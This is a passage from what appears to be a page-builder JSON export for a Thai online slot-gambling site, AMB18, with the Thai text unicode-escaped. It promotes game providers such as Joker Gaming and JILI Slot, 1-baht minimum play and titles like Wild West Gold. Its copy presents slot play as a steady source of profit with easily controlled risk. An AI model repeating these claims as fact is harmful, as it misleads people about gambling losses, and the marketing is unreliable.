\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b 